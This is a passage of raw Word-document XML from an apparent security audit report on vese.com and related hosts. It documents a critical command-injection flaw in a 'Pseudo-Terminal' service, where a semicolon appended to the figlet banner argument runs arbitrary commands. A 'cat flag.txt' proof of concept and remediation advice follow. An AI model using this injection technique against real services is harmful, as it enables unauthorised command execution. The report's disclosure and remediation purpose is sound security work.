        <w:tblInd w:w="-5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25"/>
        <w:gridCol w:w="6345"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="63A9965C" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4CDBB1B0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="233C843B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="41FBCDC4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3225" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BFA39D6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Security Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4989AE98" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t>vese.com, internal.vese.com, contact.vese.com (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>18.130.221.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7411BC28" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="676C3035" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="3C824DD3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0790F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Security Audit Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D611362" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503175D6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>Remote Code Execution (RCE) – Pseudo-Terminal service</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Critical Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482676A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="38CB2485" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="69C60AB9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D964467" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>The exposed “Pseudo-Terminal” service allows execution of arbitrary commands, by running a command string constructed from user input.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="0BE05208" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="6444DAF4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
          </w:tcPr>
          <w:p w14:paraId="4090BE46" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="0794F789" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="37B7C523" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2012AD74" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com Port: TCP 6969 (Pseudo-Terminal service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="4470CC9A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="78E905AD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8BC5EB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId7">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/77.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="73349CD0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId8">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/78.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3665FF4C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FFC7CD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0B7FF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable piece of code that allows arbitrary code execution is described in the following </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>paragraphs, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be found inside the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>switch.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file of the Pseudo-Terminal sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF9824" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>cmd_banner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function (line 74) receives a list of arguments, previously parsed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>arg_parser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function (line 16). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3C7A23" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="07139800" wp14:editId="15BAFF09">
            <wp:extent cx="4762358" cy="1110023"/>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762358" cy="1110023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426817B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Snippet of the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>cmd_banner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144233C3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the first element in the list of characters is the letter “s” the function joins the following arguments into a single string, and sets this string as the new value for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>self.banner</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>_text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Since the value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>self.banner</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>_text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is appended to the string “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>figlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ” and executed through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>os.popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function, by controlling the value of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>self.banner_text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> one can achieve code execution simply by prepending a “;” (semi-colon) character to the desired command, which will be executed on a second call of the “banner” command. The following screenshot is a proof of concept of the described vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC87EC7" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="41D6B73D" wp14:editId="65407720">
            <wp:extent cx="3605070" cy="1379718"/>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3605070" cy="1379718"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B48851" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Execution of the command “cat flag.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE2DBF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="04CA2FAF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="368DB335" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7520C248" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7B5C6352" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="5B93F2DC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D8DB28" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="09D14F02" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="225B402B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B9835F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>The suggested remediations for this issue are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F18D81" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">checking the provided arguments to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd_banner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> for special characters (any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>non alpha</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>-numeric character), and sanitize/reject the provided user input, for example by providing an informative error such as “Only alpha-numeric characters are allowed”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21CE7E55" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">if possible, avoid executing system commands if not necessary; in this </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>particular case</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, the same functionality can be achieved by switching to a python-only solution such as </w:t>
            </w:r>
            <w:hyperlink r:id="rId11">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://pypi.org/project/pyfiglet/0.7/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
